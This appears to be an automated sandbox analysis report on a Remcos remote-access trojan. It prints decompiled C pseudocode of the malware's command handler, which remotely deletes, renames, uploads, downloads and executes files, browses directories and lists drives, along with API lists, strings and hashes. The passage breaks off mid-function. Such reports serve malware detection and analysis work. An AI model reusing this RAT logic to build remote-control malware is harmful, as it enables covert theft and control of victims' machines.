                              0x0040cb17
                              0x0040cb20
                              0x0040cb23
                              0x0040cb25
                              0x0040cb37
                              0x0040cb27
                              0x0040cb2d
                              0x0040cb32
                              0x0040cb32
                              0x0040cb3e
                              0x0040cb47
                              0x0040cb47
                              0x0040cb49
                              0x0040cb4a
                              0x0040cb4a
                              0x0040cb4d
                              0x0040cb51
                              0x0040cb53
                              0x0040cb53
                              0x0040cb58
                              0x0040cb60
                              0x0040cb68
                              0x0040cb73
                              0x0040cb92
                              0x0040cb98
                              0x0040cba0
                              0x0040cba7
                              0x0040cbb1
                              0x0040cbb6
                              0x0040cbbc
                              0x0040cbc1
                              0x0040cbd2
                              0x0040cbd7
                              0x0040cbde
                              0x0040cbe3
                              0x0040cbef
                              0x0040cbf1
                              0x0040cc90
                              0x0040cca1
                              0x0040ccac
                              0x0040ccb2
                              0x0040ccb4
                              0x0040ccba
                              0x0040ccbc
                              0x0040ccbe
                              0x0040ccbe
                              0x00000000
                              0x0040ccbe
                              0x0040ccb6
                              0x0040ccb6
                              0x0040ccc0
                              0x0040ccc0
                              0x0040ccc5
                              0x0040ccd1
                              0x0040ccd1
                              0x0040ccde
                              0x0040ccf0
                              0x0040cd02
                              0x0040cd07
                              0x0040cd0c
                              0x0040cd29
                              0x0040cd3b
                              0x0040cd5a
                              0x0040cd72
                              0x0040cd74
                              0x0040cdbd
                              0x0040cd76
                              0x0040cd78
                              0x0040cd7f
                              0x0040cd8b
                              0x0040cd92
                              0x0040cd94
                              0x0040cd99
                              0x0040cd9f
                              0x0040cdb1
                              0x0040cdb4
                              0x0040cdb6
                              0x0040cdb6
                              0x0040cdd3
                              0x0040cdd5
                              0x0040cdd9
                              0x0040cde0
                              0x0040cdea
                              0x0040cdf1
                              0x0040cdf3
                              0x0040cdf8
                              0x0040cdfe
                              0x0040ce0a
                              0x0040ce0d
                              0x0040ce0f
                              0x0040ce0f
                              0x0040ce24
                              0x0040ce26
                              0x0040ce2c
                              0x0040ce39
                              0x0040ce4e
                              0x0040ce53
                              0x0040ce66
                              0x0040ce6f
                              0x0040ce74
                              0x0040ce80
                              0x0040ce82
                              0x0040ce82
                              0x0040ce97
                              0x0040ce99
                              0x0040ceb2
                              0x0040cec1
                              0x0040cec6
                              0x0040cec9
                              0x0040cecc
                              0x0040cecf
                              0x0040cecf
                              0x0040cee3
                              0x0040cee8
                              0x0040ceec
                              0x0040cef1
                              0x0040cef6
                              0x0040cef8
                              0x0040cefa
                              0x0040cefd
                              0x0040cefd
                              0x0040cf09
                              0x0040cf0b
                              0x0040cf12
                              0x0040cf1e
                              0x0040cf1e
                              0x0040cf20
                              0x0040cf27
                              0x0040cf33
                              0x0040cf33
                              0x0040cf35
                              0x0040cf3a
                              0x0040cf3a
                              0x0040cf3c
                              0x00000000
                              0x0040cf3e
                              0x0040cf3e
                              0x0040cf41
                              0x0040cf43
                              0x00000000
                              0x0040cf43
                              0x0040cf41
                              0x00000000
                              0x0040cbf7
                              0x0040cbfb
                              0x0040cc00
                              0x0040cc03
                              0x0040cc07
                              0x0040cc0c
                              0x0040cc11
                              0x0040cc14
                              0x0040cc16
                              0x00000000
                              0x0040cc18
                              0x0040cc1a
                              0x00000000
                              0x0040cc1a
                              0x0040cc16
                              0x0040cbf1
                              0x0040ca55
                              0x0040c7a5
                              0x0040c7a9
                              0x0040c7bc
                              0x0040c7c3
                              0x0040c7c5
                              0x0040cf58
                              0x0040cf62
                              0x0040cf67
                              0x0040cf67
                              0x0040cf6c
                              0x0040cf80
                              0x0040cf8f
                              0x0040cf94
                              0x0040cf9c
                              0x0040cfa0
                              0x0040cfa5
                              0x0040cfa5
                              0x0040cfaa
                              0x0040cfab
                              0x0040cfac
                              0x0040cfb1
                              0x0040cfb6
                              0x0040e3d2
                              0x0040c4fa
                              0x0040c506
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040c7c5
                              0x0040c69a
                              0x0040c69a
                              0x0040c69e
                              0x00000000
                              0x0040c6a0
                              0x0040c6a0
                              0x0040c6a4
                              0x0040c6a6
                              0x00000000
                              0x0040c6a8
                              0x0040c6a8
                              0x0040c6a9
                              0x0040c6b1
                              0x0040c6b5
                              0x0040c6bc
                              0x0040c6c6
                              0x0040c6cd
                              0x0040c6cf
                              0x0040c6d3
                              0x0040c6d8
                              0x0040c6dc
                              0x0040c6e1
                              0x0040c6e5
                              0x0040c6ea
                              0x0040c6f3
                              0x0040c6f5
                              0x0040c6f5
                              0x0040c6f6
                              0x0040c6fc
                              0x0040c6fc
                              0x0040c6a6
                              0x0040c69e

                              APIs
                              • OpenMutexA.KERNEL32 ref: 0040C7DA
                              • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C7EC
                              • CloseHandle.KERNEL32(00000000), ref: 0040C7F3
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C852
                              • GetLastError.KERNEL32 ref: 0040C858
                              • GetModuleFileNameW.KERNEL32(00000000,0046BB08,00000104), ref: 0040C879
                                • Part of subcall function 0040EC5B: __EH_prolog.LIBCMT ref: 0040EC60
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                              • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
                              • API String ID: 1247502528-1622708067
                              • Opcode ID: 2bd13613e6f57334565f536a5e53c97132575cf9c7749eeee8e38709d51e8a29
                              • Instruction ID: 42bfda91432e7fc4dea79f371f9b9f268822a4ed28c20108b284d7b9b352ec02
                              • Opcode Fuzzy Hash: 2bd13613e6f57334565f536a5e53c97132575cf9c7749eeee8e38709d51e8a29
                              • Instruction Fuzzy Hash: 6132F460B443516BDA15B7729CA7B3E25898B81748F04053FF542BB2E3EEBC9D41839E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410275, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00410275(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
			}









                              0x0041027d
                              0x0041027e
                              0x00410281
                              0x00410295
                              0x0041029d
                              0x00000000
                              0x004102cc
                              0x004102b3
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004102B3
                              • RegCloseKey.ADVAPI32(?), ref: 004102BE
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction ID: da35563d8025d65dfadb3f1a4e24c633330656b2ed15e4664ff05724ceb20d8f
                              • Opcode Fuzzy Hash: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction Fuzzy Hash: 90F01D7690030CBFDF109FA09D05BEE7BBCEB04B51F1040A5FE04E6195D2719B549B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00406930, Relevance: 39.2, APIs: 7, Strings: 15, Instructions: 716COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E00406930(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v188;
				char _v192;
				void* _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v324;
				char _v336;
				char _v344;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t163;
				signed int _t165;
				void* _t169;
				void* _t174;
				signed int _t175;
				void* _t190;
				void* _t205;
				signed int _t207;
				void* _t221;
				int _t231;
				void* _t238;
				void* _t239;
				void* _t252;
				void* _t259;
				signed int _t264;
				void* _t268;
				void* _t286;
				short* _t297;
				void* _t298;
				void* _t309;
				void* _t325;
				void* _t335;
				void* _t341;
				void* _t343;
				void* _t345;
				void* _t349;
				void* _t353;
				void* _t363;
				void* _t365;
				void* _t386;
				void* _t389;
				void* _t556;
				void* _t585;
				intOrPtr _t590;
				intOrPtr _t591;
				signed int _t592;
				signed int _t594;
				signed int _t597;
				void* _t604;
				void* _t606;
				void* _t608;
				void* _t610;
				void* _t612;
				signed int _t613;
				void* _t616;
				void* _t617;
				void* _t618;
				void* _t619;
				void* _t620;
				void* _t621;
				void* _t622;
				void* _t625;
				void* _t630;
				void* _t631;
				void* _t632;
				void* _t634;
				void* _t636;
				void* _t658;
				void* _t659;
				void* _t660;
				void* _t661;
				void* _t664;
				void* _t666;

				_t665 = __eflags;
				_t564 = __edx;
				_push(_t365);
				_t590 = _a4;
				_push(_t585);
				E004020CC(_t365,  &_v156, __edx, __eflags, _t590 + 0x1c);
				SetEvent( *(_t590 + 0x34));
				_t591 =  *((intOrPtr*)(L00401F75( &_v160)));
				E00404286( &_v160,  &_v136, 4, 0xffffffff);
				_t616 = (_t613 & 0xfffffff8) - 0xec;
				E004020CC(0x46c238, _t616, _t564, _t665, 0x46c238);
				_t617 = _t616 - 0x18;
				E004020CC(0x46c238, _t617, _t564, _t665,  &_v152);
				L00416DD0( &_v288, _t564);
				_t618 = _t617 + 0x30;
				_t666 = _t591 - 0x8b;
				if(_t666 > 0) {
					_t592 = _t591 - 0x8c;
					__eflags = _t592;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
						_t163 = GetFileAttributesW(L00401ECB( &_v260));
						__eflags = _t163 & 0x00000010;
						if((_t163 & 0x00000010) == 0) {
							_t165 = DeleteFileW(L00401ECB( &_v260));
						} else {
							_t165 = E004170AC(L00401ECB( &_v260));
						}
						__eflags = _t165;
						__eflags = _t165 & 0xffffff00 | _t165 != 0x00000000;
						if(__eflags == 0) {
							_t619 = _t618 - 0x18;
							L00416CF4(0x46c238, _t619,  &_v252);
							_push(0x55);
							L00404A6E(0x46c238, 0x46c2e8,  &_v252, __eflags);
							_t169 = L00416C93( &_v232,  &_v280);
							_t620 = _t619 - 0x18;
							_t567 = "Unable to delete: ";
							E004075C4(0x46c238, _t620, "Unable to delete: ", _t585, __eflags, _t169);
							_t621 = _t620 - 0x14;
							_t386 = _t621;
							_push("[ERROR]");
						} else {
							_t190 = L00416C93( &_v204,  &_v252);
							_t625 = _t618 - 0x18;
							_t567 = "Deleted file: ";
							E004075C4(0x46c238, _t625, "Deleted file: ", _t585, __eflags, _t190);
							_t621 = _t625 - 0x14;
							_t386 = _t621;
							_push("[Info]");
						}
						E00402064(0x46c238, _t386);
						E004165D8(0x46c238, _t585);
						_t622 = _t621 + 0x30;
						L00401FA7();
						_t174 = L00401E29( &_v288, _t567, __eflags, 1);
						_t564 = "1";
						_t389 = _t174;
						_t175 = L00405A22("1");
						__eflags = _t175;
						if(_t175 == 0) {
							L40:
							L00401ED0();
							L41:
							L00401E54( &_v284, _t564);
							L00401FA7();
							L00401FA7();
							return 0;
						} else {
							__eflags = E00407325( &_v272, _t389, _t389) + 1;
							E00407341(E00407325( &_v272, _t389, _t389) + 1);
							_t564 =  &_v284;
							L00401EDA( &_v284,  &_v284, _t592, L00402FDA(0x46c238,  &_v236,  &_v284, 0x2a));
							L00401ED0();
							E0040425F(0x46c238, _t622 - 0x18, L00401ECB( &_v288));
							L39:
							E00406176();
							goto L40;
						}
					}
					_t594 = _t592 - 1;
					__eflags = _t594;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
						E0040425F(0x46c238,  &_v192, L00401F75(L00401E29( &_v272, _t564, __eflags, 1)));
						E0040730B( &_v276,  &_v252, 0, E00407325( &_v268,  &_v192,  &_v192) + 1);
						_t205 = L00401ECB(E0040762B( &_v240,  &_v264,  &_v216));
						_t207 = E00439234(L00401ECB( &_v288), _t205);
						asm("sbb bl, bl");
						L00401ED0();
						_t370 =  ~_t207 + 1;
						__eflags =  ~_t207 + 1;
						if(__eflags == 0) {
							_t564 = E004075E8( &_v204, "Unable to rename file!", __eflags, 0x46c238);
							E0040530D(_t370, _t618 - 0x18, _t209, _t585, __eflags, "16");
							_push(0x59);
							L00404A6E(_t370, 0x46c2e8, _t209, __eflags);
							L00401FA7();
						} else {
							_t564 =  &_v228;
							E00407516(_t618 - 0x18,  &_v228, __eflags, "*");
							E00406176();
						}
						L00401ED0();
						L13:
						L00401ED0();
						goto L40;
					}
					_t597 = _t594 - 1;
					__eflags = _t597;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
						_t221 = L00401F75(L00401E29( &_v272, _t564, __eflags, 1));
						_t564 =  &_v264;
						CreateDirectoryW(L00401ECB(E00407516( &_v216,  &_v264, __eflags, _t221)), 0);
						L00401ED0();
						E004032E0(0x2a);
						E00407352(0x46c238, _t618 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t599 = _t597 - 3;
					__eflags = _t597 - 3;
					if(__eflags == 0) {
						_t231 = StrToIntA(L00401F75(L00401E29( &_v264, _t564, __eflags, _t599)));
						_t564 = L00401F75(L00401E29( &_v268, _t564, __eflags, 1));
						E00417868(_t231, _t233);
					}
					goto L41;
				}
				if(_t666 == 0) {
					E004020B5(0x46c238,  &_v252);
					E00404818(0x46c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004049D2(_t564);
					_t238 = L00401E29( &_v284, _t564, __eflags, 3);
					_t630 = _t618 - 0xfffffffffffffff8;
					_t239 = L00401E29( &_v288, _t564, __eflags, 2);
					L00402F73(0x46c238, _t630, L00402F73(0x46c238,  &_v212, L00402F73(0x46c238,  &_v260, L00402F97( &_v236, L00401E29( &_v292, _t564, __eflags, 1), 0x46c238), __eflags, _t239), __eflags, 0x46c238), __eflags, _t238);
					L00404A6E(0x46c238,  &_v140, _t243, __eflags);
					L00401FA7();
					L00401FA7();
					L00401FA7();
					E0040425F(0x46c238,  &_v292, L00401F75(L00401E29( &_v324, _t243, __eflags, 0)));
					_t252 = L00416C93( &_v272,  &_v296);
					_t631 = _t630 - 0x18;
					E004075C4(0x46c238, _t631, "Downloading file: ", _t618 - 0x10, __eflags, _t252);
					_t632 = _t631 - 0x14;
					E00402064(0x46c238, _t632, "[Info]");
					E004165D8(0x46c238, "[Info]");
					L00401FA7();
					L00401ED0();
					_t259 = L00401F75(L00401E29( &_v336, "Downloading file: ", __eflags, 0));
					_t634 = _t632 + 0x30 - 0x18;
					E0040425F(0x46c238, _t634, _t259);
					_t264 = E0040628B( &_v192, __eflags, E004391B0(_t261, L00401F75(L00401E29( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t636 = _t634 + 0x2c;
					__eflags = _t264;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v264, L00401F75(L00401E29( &_v296, "Downloading file: ", __eflags, 0)));
						_t268 = L00416C93( &_v244,  &_v268);
						_t564 = "Failed to download file: ";
						E004075C4(0x46c238, _t636 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t268);
						E00402064(0x46c238, _t636 - 4, "[ERROR]");
						E004165D8(0x46c238, "[Info]");
						L00401FA7();
						L00401ED0();
					} else {
						E004075C4(0x46c238, _t636 - 0x18, "Downloaded file size: ", "[Info]", __eflags, L00416B7E(0x46c238,  &_v236, E00402469()));
						E00402064(0x46c238, _t636 - 4, "[DEBUG]");
						E004165D8(0x46c238, "[Info]");
						L00401FA7();
						E0040425F(0x46c238,  &_v268, L00401F75(L00401E29( &_v300, "Downloaded file size: ", __eflags, 0)));
						_t286 = L00416C93( &_v248,  &_v272);
						_t564 = "Downloaded file: ";
						E004075C4(0x46c238, _t636 - 4 + 0x30 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t286);
						E00402064(0x46c238, _t636 - 4 + 0x30 - 4, "[Info]");
						E004165D8(0x46c238, "[Info]");
						L00401FA7();
						L00401ED0();
						E00402064(0x46c238, _t636 - 4 + 0x30 - 4 + 0x30 - 0x18, 0x45f6ac);
						_push(0x58);
						L00404A6E(0x46c238,  &_v160, "Downloaded file: ", __eflags);
					}
					L00404DD5( &_v140);
					L00404DF9(0x46c238,  &_v140, 0);
					L15:
					L00401FA7();
					goto L41;
				}
				_t604 = _t591 - 0x61;
				if(_t604 == 0) {
					E0040425F(0x46c238, _t618 - 0x18, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
					_t297 = L00401E29( &_v272, _t564, __eflags, 2);
					_t298 = L00401E29( &_v276, _t564, __eflags, 1);
					_t564 = _t297;
					E0041636B(_t298, _t297);
					goto L41;
				}
				_t606 = _t604 - 0x26;
				if(_t606 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E0040208B(0x46c238,  &_v252, _t564, __eflags,  &_v108, 0x64);
					__eflags = E00407399( &_v260, 0x45f850, 0, 2) + 1;
					L00401F64(E00407399( &_v260, 0x45f850, 0, 2) + 1);
					E004020CC(0x46c238, _t618 - 0x18, _t564, E00407399( &_v260, 0x45f850, 0, 2) + 1,  &_v276);
					_t309 = E004063B9(0x46c238,  &_v256);
					_t564 = L00402F97( &_v208,  &_v280, 0x46c238);
					L00402EFD(_t618 - 0x18, _t310, _t309);
					_push(0x51);
					L00404A6E(0x46c238, 0x46c2e8, _t310, __eflags);
					L00401FA7();
					L00401FA7();
					goto L15;
				}
				_t608 = _t606 - 1;
				if(_t608 == 0) {
					E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
					E00407352(0x46c238, _t618 - 0x18, _t564, __eflags,  &_v260);
					E00406176();
					__eflags = E00402469() - 2;
					_t325 = L00416C93( &_v204, E0040730B( &_v264,  &_v240, 0, E00402469() - 2));
					_t564 = "Browsing directory: ";
					E004075C4(0x46c238, _t618 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t585, E00402469() - 2, _t325);
					E00402064(0x46c238, _t618 - 0x18 + 0x18 - 4, "[Info]");
					E004165D8(0x46c238, _t585);
					L00401FA7();
					goto L13;
				}
				_t610 = _t608 - 1;
				if(_t610 == 0) {
					E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
					ShellExecuteW(0, L"open", L00401ECB( &_v260), 0, 0, 1);
					_t335 = L00416C93( &_v188,  &_v260);
					_t564 = "Executing file: ";
					E004075C4(0x46c238, _t618 - 0x18, "Executing file: ", _t585, __eflags, _t335);
					E00402064(0x46c238, _t618 - 4, "[Info]");
					E004165D8(0x46c238, _t585);
					L00401FA7();
					goto L40;
				} else {
					_t612 = _t610 - 1;
					_t671 = _t612;
					if(_t612 == 0) {
						E004072F8( &_v108);
						_t341 = L00401E29( &_v264, _t564, _t671, 3);
						_t658 = _t618 - 0x18;
						E004020CC(0x46c238, _t658, _t564, _t671, _t341);
						_t343 = L00401E29( &_v272, _t564, _t671, 2);
						_t659 = _t658 - 0x18;
						E004020CC(0x46c238, _t659, _t564, _t671, _t343);
						_t345 = L00401E29( &_v280, _t564, _t671, 1);
						_t660 = _t659 - 0x18;
						E004020CC(0x46c238, _t660, _t564, _t671, _t345);
						_push(L00401F75(L00401E29( &_v288, _t564, _t671, _t612)));
						_t349 = E00406455( &_v136, _t564);
						_push(_t612);
						_t672 = _t349;
						if(_t349 == 0) {
							E0040425F(0x46c238,  &_v252, L00401F75(L00401E29( &_v368, _t564, __eflags)));
							_t353 = L00416C93( &_v208,  &_v256);
							_t661 = _t660 - 0x18;
							_t564 = "Failed to upload file: ";
							E004075C4(0x46c238, _t661, "Failed to upload file: ", _t585, __eflags, _t353);
							_t556 = _t661 - 0x14;
							_push("[ERROR]");
						} else {
							E0040425F(0x46c238,  &_v252, L00401F75(L00401E29( &_v368, _t564, _t672)));
							_t363 = L00416C93( &_v208,  &_v256);
							_t664 = _t660 - 0x18;
							_t564 = "Uploaded file: ";
							E004075C4(0x46c238, _t664, "Uploaded file: ", _t585, _t672, _t363);
							_t556 = _t664 - 0x14;
							_push("[Info]");
						}
						E00402064(0x46c238, _t556);
						E004165D8(0x46c238, _t585);
						L00401FA7();
						L00401ED0();
						L00407306(0x46c238,  &_v132, _t612);
					}
					goto L41;
				}
			}













































































































                              0x00406930
                              0x00406930
                              0x00406940
                              0x00406942
                              0x00406945
                              0x0040694a
                              0x00406952
                              0x0040696c
                              0x00406976
                              0x0040697b
                              0x00406986
                              0x0040698b
                              0x00406998
                              0x004069a1
                              0x004069ab
                              0x004069ae
                              0x004069b0
                              0x00406faf
                              0x00406faf
                              0x00406fb5
                              0x0040719a
                              0x004071a9
                              0x004071b3
                              0x004071b5
                              0x004071cb
                              0x004071b7
                              0x004071be
                              0x004071be
                              0x004071d1
                              0x004071da
                              0x004071dc
                              0x00407203
                              0x00407208
                              0x0040720d
                              0x00407214
                              0x00407221
                              0x00407226
                              0x00407229
                              0x00407231
                              0x00407236
                              0x00407239
                              0x0040723b
                              0x004071de
                              0x004071e2
                              0x004071e7
                              0x004071ea
                              0x004071f2
                              0x004071f7
                              0x004071fa
                              0x004071fc
                              0x004071fc
                              0x00407240
                              0x00407245
                              0x0040724a
                              0x00407251
                              0x0040725c
                              0x00407261
                              0x00407266
                              0x00407268
                              0x0040726d
                              0x0040726f
                              0x004072c6
                              0x004072ca
                              0x004072cf
                              0x004072d3
                              0x004072df
                              0x004072e8
                              0x004072f5
                              0x00407271
                              0x0040727c
                              0x00407282
                              0x00407289
                              0x0040729c
                              0x004072a5
                              0x004072b9
                              0x004072be
                              0x004072be
                              0x00000000
                              0x004072c3
                              0x0040726f
                              0x00406fbb
                              0x00406fbb
                              0x00406fbe
                              0x00407099
                              0x004070b5
                              0x004070d1
                              0x004070eb
                              0x004070fb
                              0x0040710a
                              0x0040710c
                              0x00407111
                              0x00407111
                              0x00407114
                              0x00407152
                              0x00407156
                              0x0040715c
                              0x00407163
                              0x0040716c
                              0x00407116
                              0x00407119
                              0x00407124
                              0x0040712a
                              0x0040712f
                              0x00407175
                              0x00406c12
                              0x00406c12
                              0x00000000
                              0x00406c12
                              0x00406fc4
                              0x00406fc4
                              0x00406fc7
                              0x00407024
                              0x00407037
                              0x0040703d
                              0x00407053
                              0x0040705d
                              0x00407068
                              0x00407077
                              0x00000000
                              0x00407077
                              0x00406fc9
                              0x00406fc9
                              0x00406fcc
                              0x00406fe4
                              0x00406ffe
                              0x00407002
                              0x00407002
                              0x00000000
                              0x00406fcc
                              0x004069b6
                              0x00406d09
                              0x00406d17
                              0x00406d2d
                              0x00406d2e
                              0x00406d2f
                              0x00406d30
                              0x00406d31
                              0x00406d3c
                              0x00406d41
                              0x00406d4e
                              0x00406d8b
                              0x00406d9a
                              0x00406da3
                              0x00406dac
                              0x00406db5
                              0x00406dd2
                              0x00406ddf
                              0x00406de4
                              0x00406def
                              0x00406df4
                              0x00406dff
                              0x00406e04
                              0x00406e10
                              0x00406e19
                              0x00406e2a
                              0x00406e2f
                              0x00406e35
                              0x00406e61
                              0x00406e66
                              0x00406e69
                              0x00406e6b
                              0x00406f47
                              0x00406f54
                              0x00406f5c
                              0x00406f64
                              0x00406f73
                              0x00406f78
                              0x00406f84
                              0x00406f8d
                              0x00406e71
                              0x00406e90
                              0x00406e9f
                              0x00406ea4
                              0x00406eb0
                              0x00406ecb
                              0x00406ed8
                              0x00406ee0
                              0x00406ee8
                              0x00406ef3
                              0x00406ef8
                              0x00406f04
                              0x00406f0d
                              0x00406f1c
                              0x00406f21
                              0x00406f2a
                              0x00406f2a
                              0x00406f99
                              0x00406fa5
                              0x00406cb1
                              0x00406cb5
                              0x00000000
                              0x00406cb5
                              0x004069bc
                              0x004069bf
                              0x00406cd7
                              0x00406ce2
                              0x00406cef
                              0x00406cf4
                              0x00406cf8
                              0x00000000
                              0x00406cfd
                              0x004069c5
                              0x004069c8
                              0x00406c26
                              0x00406c3a
                              0x00406c51
                              0x00406c57
                              0x00406c66
                              0x00406c6f
                              0x00406c89
                              0x00406c8d
                              0x00406c93
                              0x00406c9a
                              0x00406ca3
                              0x00406cac
                              0x00000000
                              0x00406cac
                              0x004069ce
                              0x004069d1
                              0x00406b9b
                              0x00406baa
                              0x00406baf
                              0x00406bc0
                              0x00406bd9
                              0x00406be1
                              0x00406be9
                              0x00406bf8
                              0x00406bfd
                              0x00406c09
                              0x00000000
                              0x00406c0e
                              0x004069d7
                              0x004069da
                              0x00406b22
                              0x00406b3b
                              0x00406b49
                              0x00406b51
                              0x00406b59
                              0x00406b68
                              0x00406b6d
                              0x00406b79
                              0x00000000
                              0x004069e0
                              0x004069e0
                              0x004069e0
                              0x004069e3
                              0x004069f0
                              0x004069fb
                              0x00406a00
                              0x00406a06
                              0x00406a11
                              0x00406a16
                              0x00406a1c
                              0x00406a27
                              0x00406a2c
                              0x00406a32
                              0x00406a48
                              0x00406a50
                              0x00406a59
                              0x00406a5a
                              0x00406a5c
                              0x00406aae
                              0x00406abb
                              0x00406ac0
                              0x00406ac3
                              0x00406acb
                              0x00406ad3
                              0x00406ad5
                              0x00406a5e
                              0x00406a6f
                              0x00406a7c
                              0x00406a81
                              0x00406a84
                              0x00406a8c
                              0x00406a94
                              0x00406a96
                              0x00406a96
                              0x00406ada
                              0x00406adf
                              0x00406aeb
                              0x00406af4
                              0x00406b00
                              0x00406b00
                              0x00000000
                              0x004069e3

                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00406952
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B3B
                                • Part of subcall function 00406455: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0
                                • Part of subcall function 0040628B: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
                                • Part of subcall function 0040628B: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
                                • Part of subcall function 0040628B: CloseHandle.KERNEL32(00000000), ref: 00406366
                                • Part of subcall function 0040628B: MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                              • GetLogicalDriveStringsA.KERNEL32 ref: 00406C26
                              • StrToIntA.SHLWAPI(00000000,?), ref: 00406FE4
                              • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407053
                                • Part of subcall function 00406176: FindFirstFileW.KERNEL32(00000000,?), ref: 00406191
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                              • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[Info]$open
                              • API String ID: 4189642951-3341346664
                              • Opcode ID: 09d1902499010c02f79476bc2c46c0f2a592e2f515d2050452ab4878c7d29c6c
                              • Instruction ID: 825834acea58237ea27b8ef3a258c04868925692b220403c8df577372deca8be
                              • Opcode Fuzzy Hash: 09d1902499010c02f79476bc2c46c0f2a592e2f515d2050452ab4878c7d29c6c
                              • Instruction Fuzzy Hash: 43326471A143016BC604FB76C866DAF77659F91348F40093FF942671E2EE3CAA09C69B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F4B7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194threadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E0040F4B7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
